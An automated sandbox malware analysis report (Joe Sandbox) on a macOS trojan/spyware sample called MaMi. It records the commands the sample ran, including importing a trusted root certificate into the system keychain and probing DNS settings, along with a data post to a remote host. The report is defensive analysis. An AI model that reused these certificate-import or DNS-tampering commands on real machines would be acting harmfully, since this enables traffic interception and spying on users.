Analysis Report

Overview

General Information

Joe Sandbox Version:	21.0.0
Analysis ID:	48021
Start time:	10:37:03
Joe Sandbox Product:	Cloud
Start date:	16.01.2018
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MaMi
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Virtual Machine, El Capitan 10.11.6 (MS Office 15.34, Java 1.8.0_131)
Detection:	MAL
Classification:	mal80.troj.spyw.evad.mac@0/43@5/0

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	80	0 - 100	Report FP / FN

Classification

Signature Overview

Click to jump to signature section

Cryptography:

Imports (root) certificates into the systems keychain typically to intercept SSL traffic or bypass code integrity protections

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

Certificate import: /usr/bin/security -> /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /Users/luke/Desktop/MaMi.bin

Writes DER encoded certificate files to disk without the typical file extension

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

DER file created: /Users/luke/Desktop/.dat.nosync0201.Jo8P8B

Networking:

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /?r=9jc3i8XAbBPh_SVJQUQMiFWKWE9RYEK6JViGhaUYGHAYT3PiZABNyX3y-tKFjbgD5_8POTdplyBinajb97o1If7zCzR18UCtQ2i4ObCx2dpWKhG2VCVNdWJqFMjFRYYt2ESeWm24gTzYVGMNbOgzf6qV92lBPjYi4S_ReFM5CiSC6aQGX9sMdWYckHXKG4mSk-pgf__svmzjvNx5TioAqNDZnyT3dcYL7ftr0__I1T2vujIgXH7cHolsvyPM0mL1_SwfyLc5BCaSgKtFU8zWVyrQ8xC3Hq8ez3uJWtCToFXhwT-Zs5K0QRPoeDldKoE8X0sovErtC7bbeT3T7-_VX1bbzRGcT9ujraFOhWJTPSCVTHJf_jFq2p6NSwpM26PPeBS2NpWwIs-n266MLXRGM75xjcGz2ybVRLqegEoN226KJRhhLtVjA-c2ddfJuPbMjEWRn7jwfSOFRAuszW1dfWR5oc0H2KdsHMZaH9BCv2jIkWIPLdbko7gbUe7jCuX5E_wiYbc3wjmy903wKiLxWHJDabVoSkuLP9auX3UKJQuBFvs_Ty95UEKIxBmHC50R1Crcsq47rSej7DWUXaqrCJgYAGw0SHYYP5ADY75FV6jrT5C2YyDtlDygzej-m9DNRDJq268rTdsYGLV-QwU3-Y-jyxjGmxMwiv_upoVtRcqyQLhgb4igduxcdGdHHoXd4NQUkYWVZJTDfzZh5u1Rv71kn9HvgQfNaOASkVj0XOEeWaBYWnsXqbvdCMkB6jz0XzUbyhsPxc99zI1E90ULe96RA1qtZPlqZdErF3anES4m0zrwVxm1qsgPT6zxaWbb3FUn_Kaot4AHNRhOO6CRXJxXwhZlqaG8LHC1kxQBtYVrSrhGSrr8a_BaM-XInpz7eXcLyK0mlfMtNft0fGtT7dISjExcsKlBzWydT96ywKN2oPNJjkcugIq5i9bm06O-cY-z04cv5SBSi14T7OgvEpB5um58n7YJwDJ2QEsC6EoQNazIOo71kNEka
Source: global traffic	HTTP traffic detected: GET /?r=9jc3i8XAbBPh_SVJQUQMiFWKWE9RYEK6JViGhaUYGHAYT3PiZABNyX3y-tKFjbgD5_8POTdplyBinajb97o1If7zCzR18UCtQ2i4ObCx2dpWKhG2VCVNdWJqFMjFRYYt2ESeWm24gTzYVGMNbOgzf6qV92lBPjYi4S_ReFM5CiSC6aQGX9sMdWYckHXKG4mSk-pgf__svmzjvNx5TioAqNDZnyT3dcYL7ftr0__I1T2vujIgXH7cHolsvyPM0mL1_SwfyLc5BCaSgKtFU8zWVyrQ8xC3Hq8ez3uJWtCToFXhwT-Zs5K0QRPoeDldKoE8X0sovErtC7bbeT3T7-_VX1bbzRGcT9ujraFOhWJTPSCVTHJf_jFq2p6NSwpM26PPeBS2NpWwIs-n266MLXRGM75xjcGz2ybVRLqegEoN226KJRhhLtVjA-c2ddfJuPbMjEWRn7jwfSOFRAuszW1dfWR5oc0H2KdsHMZaH9BCv2jIkWIPLdbko7gbUe7jCuX5E_wiYbc3wjmy903wKiLxWHJDabVoSkuLP9auX3UKJQuBFvs_Ty95UEKIxBmHC50R1Crcsq47rSej7DWUXaqrCJgYAGw0SHYYP5ADY75FV6jrT5C2YyDtlDygzej-m9DNRDJq268rTdsYGLV-QwU3-Y-jyxjGmxMwiv_upoVtRcqyQLhgb4igduxcdGdHHoXd4NQUkYWVZJTDfzZh5u1Rv71kn9HvgQfNaOASkVj0XOEeWaBYWnsXqbvdCMkB6jz0XzUbyhsPxc99zI1E90ULe96RA1qtZPlqZdErF3anES4m0zrwVxm1qsgPT6zxaWbb3FUn_Kaot4AHNRhOO6CRXJxXwhZlqaG8LHC1kxQBtYVrSrhGSrr8a_BaM-XInpz7eXcLyK0mlfMtNft0fGtT7dISjExcsKlBzWydT96ywKN2oPNJjkcugIq5i9bm06O-cY-z04cv5SBSi14T7OgvEpB5um58n7YJwDJ2QEsC6EoQNazIOo71kNEka
Source: global traffic	HTTP traffic detected: GET /?r=9jc3i8XAbBPh_SVJQUQMiFWKWE9RYEK6JViGhaUYGHAYT3PiZABNyX3y-tKFjbgD5_8POTdplyBinajb97o1If7zCzR18UCtQ2i4ObCx2dpWKhG2VCVNdWJqFMjFRYYt2ESeWm24gTzYVGMNbOgzf6qV92lBPjYi4S_ReFM5CiSC6aQGX9sMdWYckHXKG4mSk-pgf__svmzjvNx5TioAqNDZnyT3dcYL7ftr0__I1T2vujIgXH7cHolsvyPM0mL1_SwfyLc5BCaSgKtFU8zWVyrQ8xC3Hq8ez3uJWtCToFXhwT-Zs5K0QRPoeDldKoE8X0sovErtC7bbeT3T7-_VX1bbzRGcT9ujraFOhWJTPSCVTHJf_jFq2p6NSwpM26PPeBS2NpWwIs-n266MLXRGM75xjcGz2ybVRLqegEoN226KJRhhLtVjA-c2ddfJuPbMjEWRn7jwfSOFRAuszW1dfWR5oc0H2KdsHMZaH9BCv2jIkWIPLdbko7gbUe7jCuX5E_wiYbc3wjmy903wKiLxWHJDabVoSkuLP9auX3UKJQuBFvs_Ty95UEKIxBmHC50R1Crcsq47rSej7DWUXaqrCJgYAGw0SHYYP5ADY75FV6jrT5C2YyDtlDygzej-m9DNRDJq268rTdsYGLV-QwU3-Y-jyxjGmxMwiv_upoVtRcqyQLhgb4igduxcdGdHHoXd4NQUkYWVZJTDfzZh5u1Rv71kn9HvgQfNaOASkVj0XOEeWaBYWnsXqbvdCMkB6jz0XzUbyhsPxc99zI1E90ULe96RA1qtZPlqZdErF3anES4m0zrwVxm1qsgPT6zxaWbb3FUn_Kaot4AHNRhOO6CRXJxXwhZlqaG8LHC1kxQBtYVrSrhGSrr8a_BaM-XInpz7eXcLyK0mlfMtNft0fGtT7dISjExcsKlBzWydT96ywKN2oPNJjkcugIq5i9bm06O-cY-z04cv5SBSi14T7OgvEpB5um58n7YJwDJ2QEsC6EoQNazIOo71kNEka

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: W7

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: squartera.infoUser-Agent: Content-Type: application/x-www-form-urlencodedContent-Length: 2347Accept-Encoding: gzipConnection: close

Reads from file descriptors related to (network) sockets

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

Reads from socket in process: data

Urls found in memory or binary data

Show sources

Source: MaMi	String found in binary or memory: http://bbc.com
Source: MaMi	String found in binary or memory: http://cnn.com
Source: MaMi	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443

Writes from file descriptors related to (network) sockets

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

Writes from socket in process: data

Executes the "networksetup" command used to configure network settings

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)	Networksetup executable: /usr/sbin/networksetup -> /usr/sbin/networksetup -listnetworkserviceorder
Source: /Users/luke/Desktop/MaMi (PID: 513)	Networksetup executable: /usr/sbin/networksetup -> /usr/sbin/networksetup -getdnsservers Ethernet

Explicitly retrieves the order of network devices used for connecting to the network

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

Networksetup with list network services order args: /usr/sbin/networksetup -listnetworkserviceorder

Explicitly retrieves the configured DNS servers

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

Networksetup with get DNS servers args: /usr/sbin/networksetup -getdnsservers Ethernet

System Summary:

Classification label

Show sources

Source: classification engine

Classification label: mal80.troj.spyw.evad.mac@0/43@5/0

Data Obfuscation:

Imports the IOKit library (often used to register services)

Show sources

Source: initial sample

Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Persistence and Installation Behavior:

Executes the "awk" command used to scan for patterns (typically in standard output)

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

Awk executable: /usr/bin/awk -> /usr/bin/awk /IOPlatformSerialNumber/ { print $4 }

Reads data from the local random generator

Show sources

Source: /usr/libexec/diskmanagementd (PID: 509)	Random device file read: /dev/random
Source: /Users/luke/Desktop/MaMi (PID: 513)	Random device file read: /dev/urandom
Source: /Users/luke/Desktop/MaMi (PID: 513)	Random device file read: /dev/random
Source: /usr/bin/security (PID: 598)	Random device file read: /dev/random

Uses AppleKeyboardLayouts bundle containing keyboard layouts

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist

Writes property list (.plist) files to disk

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist-new
Source: /bin/cp (PID: 518)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 520)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 524)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 526)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 537)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 539)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 543)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 545)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 549)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 551)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 555)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 557)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 561)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 563)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 567)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 569)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 573)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 575)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 579)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 581)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 585)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 587)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 595)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 597)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 603)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 605)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 609)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 611)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 615)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 617)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 621)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 623)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 627)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 629)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 633)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 635)	XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old

Creates hidden files, links and/or directories

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)	Hidden file created: /Users/luke/Library/Application Support/.dat.nosync0201.GCXGyu
Source: /Users/luke/Desktop/MaMi (PID: 513)	Hidden file created: /Users/luke/Desktop/.dat.nosync0201.Jo8P8B

Executes commands using a shell command-line interpreter

Show sources

Source: /usr/sbin/networksetup (PID: 517)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 519)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 523)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 525)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 536)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 538)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 542)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 544)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 548)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 550)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 554)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 556)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 560)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 562)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 566)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 568)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 572)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 574)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 578)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 580)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 584)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 586)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 594)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 596)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 602)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 604)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 608)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 610)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 614)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 616)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 620)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 622)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 626)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 628)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 632)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 634)	Shell command executed: sh -c cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old

Executes the "scutil" command used to manage network related system configuration parameters

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

Scutil executable: /usr/sbin/scutil -> /usr/sbin/scutil

Many shell processes execute programs via execve syscall (may be indicative for malicious behavior)

Show sources

Source: /bin/sh (PID: 518)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 520)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 524)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 526)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 537)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 539)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 543)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 545)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 549)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 551)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 555)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 557)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 561)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 563)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 567)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 569)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 573)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 575)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 579)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 581)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 585)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 587)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 595)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 597)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 603)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 605)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 609)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 611)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 615)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 617)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 621)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 623)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 627)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 629)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 633)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 635)	Shell process: cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old

Samples exit code indicates no error despite standard error output

Show sources

Source: submitted sample

Stderr: 2018-01-16 11:38:38.416 MaMi[513:4712] chmodding parent /var/root/Library/Cookies with perm 700: exit code = 0

Writes DER encoded certificate files to disk without the typical file extension

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

DER file created: /Users/luke/Desktop/.dat.nosync0201.Jo8P8B

Hooking and other Techniques for Hiding and Protection:

Moves itself during installation or deletes itself after installation

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

File deleted: /Users/luke/Desktop/MaMi

Language, Device and Operating System Detection:

Reads the system or server version plist file

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Reads the systems hostname

Show sources

Source: /bin/sh (PID: 518)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 520)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 524)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 526)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 537)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 539)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 543)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 545)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 549)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 551)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 555)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 557)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 561)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 563)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 567)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 569)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 573)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 575)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 579)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 581)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 585)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 587)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 595)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 597)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 603)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 605)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 609)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 611)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 615)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 617)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 621)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 623)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 627)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 629)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 633)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 635)	Sysctl requested: kern.hostname (1.10)

Executes the "ioreg" command used to gather hardware information (I/O kit registry)

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

IOreg executable: /usr/sbin/ioreg -> /usr/sbin/ioreg -l

Queries the unique Apple serial number of the machine

Show sources

Source: /Users/luke/Desktop/MaMi (PID: 513)

